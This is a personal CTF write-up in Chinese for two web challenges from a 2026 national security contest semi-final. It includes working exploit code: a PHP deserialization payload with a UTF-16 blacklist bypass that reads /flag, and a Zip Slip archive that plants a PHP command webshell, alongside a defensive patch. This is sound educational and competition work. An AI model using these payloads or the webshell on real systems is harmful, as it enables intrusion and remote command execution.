第十九届全国大学生信息安全竞赛暨第三届「长城杯」网数智安全大赛半决赛个人题解
March 22, 2026
真的不打了。
Web - MediaDrive
攻击
User 对象反序列化后没有检查属性是否合法,在 preview.php 中黑名单又是在编码转换之前的,可以通过 UTF-16 等编码绕过黑名单。先构造 User 对象:
class User {
public $name = "guest";
public $encoding = "UTF-16";
public $basePath = "";
}
$obj = new User();
file_put_contents("user.txt", urlencode(serialize($obj)));然后读一下文件:
import requests
TARGET = "http://[REDACTED]/preview.php"
user_obj = open('user.txt', 'rt').read()
filepath = "/flag".encode("utf-16")
response = requests.get(TARGET,
params={"f": filepath},
cookies={"user": user_obj})
response.raise_for_status()
with open("resp.html", "wt") as f:
f.write(response.text)防御
在 lib/User.php 中加上属性检查:
<?php
declare(strict_types=1);
class User {
public string $name = "guest";
public string $encoding = "UTF-8";
public string $basePath = "/var/www/html/uploads/";
public function __construct(string $name = "guest") {
$this->name = $name;
}
public function __wakeup() {
if (!in_array($this->encoding, ["UTF-8", "GBK", "BIG5", "ISO-2022-CN-EXT"], true)) {
$this->encoding = "UTF-8";
}
if ($this->basePath !== "/var/www/html/uploads/") {
$this->basePath = "/var/www/html/uploads/";
}
}
}Web - easy_time
攻击
查阅提供的附件可以得知,靶机上内部在 80 端口运行一个 Apache + PHP,然后向外暴露一个 Flask。审计 Python 代码,发现处理上传 Zip 实际使用的是 safe_upload 方法,并没有防范 Zip Slip。并且 fetch_remote_avatar_info 方法也没有阻挡对本地发起请求,可以 SSRF 请求 PHP 并且带回响应。先构造一个 Zip 上传 PHP 马:
import zipfile
with zipfile.ZipFile('evil.zip', 'w') as zf:
zf.writestr(
'../../../var/www/html/cmd.php',
'<?php var_dump(system($_GET["c"]));\n'
)登录部分,Cookie 没有任何校验机制,直接自己设置一个,就能登录为 admin:
上传 Zip 之后,通过 PHP 找 Flag:
Tags: #CTF #Writeup #CISCN #Web
This article is authored by luoingly and licensed under CC BY-NC 4.0